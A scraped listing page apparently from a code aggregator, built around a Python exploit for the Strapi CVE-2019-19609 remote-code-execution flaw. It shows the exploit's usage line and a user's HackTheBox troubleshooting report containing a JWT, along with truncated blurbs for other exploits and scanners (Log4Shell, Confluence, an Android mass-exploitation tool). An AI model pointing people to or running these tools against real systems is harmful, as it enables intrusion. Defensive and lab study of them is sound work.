Strapi Framework Vulnerable to Remote Code Execution
well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/
python3 exploit.py <rhost> <lhost> <jwt> <url>
https://hack-fast.herokuapp.com/cve/CVE-2019-19609
https://github.com/strapi/strapi/pull/4636
ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse
SonicWALL SSL-VPN Web Server Vulnerable Exploit
adb - An exploitation tool for android devices. A tool that allows you to search for vulnerable android devices across the world and exploit them. Fea
omigood (OM I GOOD?) This repository contains a free scanner to detect VMs vulnerable to one of the "OMIGOD" vulnerabilities discovered by Wiz's threa
CVE-2021-41773 PoC Proof of concept to check if hosts are vulnerable to CVE-2021-41773. Description (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CV
reapoc OpenSource Poc && Vulnerable-Target Storage Box. We are aming to collect different normalized poc and the vulerable target to verify it. Now re
Log4j-CVE-2021-44228 Mass Check Vulnerable Log4j CVE-2021-44228 Introduction Actually I just checked via Vulnerable Application from https://github.co
log4j-finder A Python3 script to scan the filesystem to find Log4j2 that is vulnerable to Log4Shell (CVE-2021-44228) It scans recursively both on disk
Log4j_checker.py (CVE-2021-44228) Description This Python3 script tries to look for servers vulnerable to CVE-2021-44228, also known as Log4Shell, a v
Hi,
so I am using the exploit on a hackthebox machine. When executing the script, this is shown:
Strapi Framework Vulnerable to Remote Code Execution - CVE-2019-19609 please set up a listener on port 9001 before running the script. you will get a shell to that listener
Traceback (most recent call last):
File "/home/oceanhawk/CVE/CVE-2019-19609/exploit.py", line 30, in
I get no shell to my listener on 9001.
The command I type is this:
python3 exploit.py api-prod.horizontal.htb lhost eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MywiaXNBZG1pbiI6dHJ1ZSwiaWF0IjoxNjM0NjUxMTc5LCJleHAiOjE2MzcyNDMxNzl9.h_EP9dFh_0qAIZU3lvl1SpVkkYlBY_nN45BGQ7ptIqw http://api-prod.horizontall.htb/
CVE-2021-22911 Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1 The getPasswordPolicy method is vulnerable to NoS
CVE-2012-2982 John Hammond | September 4th, 2021 Checking searchsploit for Webmin 1.580 I only saw a Metasploit module for the /file/show.cgi Remote C
CVE-2021-26084 CVE-2021-26084 Remote Code Execution on Confluence Servers. Dork Fofa: app="ATLASSIAN-Confluence" Usage Show help information. python P
Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha
Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P
Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j 漏洞本地检测脚本,扫描主机上所有java进程,检测是否引入了有漏洞的log4j-core jar包,是否可能遭到远程代码执行攻击(CVE-2021-45046)。上传扫描报告到指定的服
Log4jUnifi Exploiting CVE-2021-44228 in Unifi Network Application for remote cod
Log4jHorizon Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. BLOG COMING SOON Code and README.md this time around are
CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17. Detail HTTP
Übersicht RCE 0day Unauthenticated remote command execution 0day exploit for Übersicht. Description Übersicht is a desktop widget application for m
3 Dec 4, 2022
44 Nov 15, 2022
136 Jan 2, 2023
13 Jul 13, 2022
43 Nov 9, 2022
560 Dec 23, 2022
6 Dec 28, 2022
431 Dec 22, 2022
8 Feb 27, 2022
47 Nov 9, 2022
25 Dec 8, 2022
63 Dec 30, 2022
2 Dec 30, 2021
81 Dec 20, 2022
86 Dec 9, 2022
365 Nov 30, 2022
10 Dec 21, 2021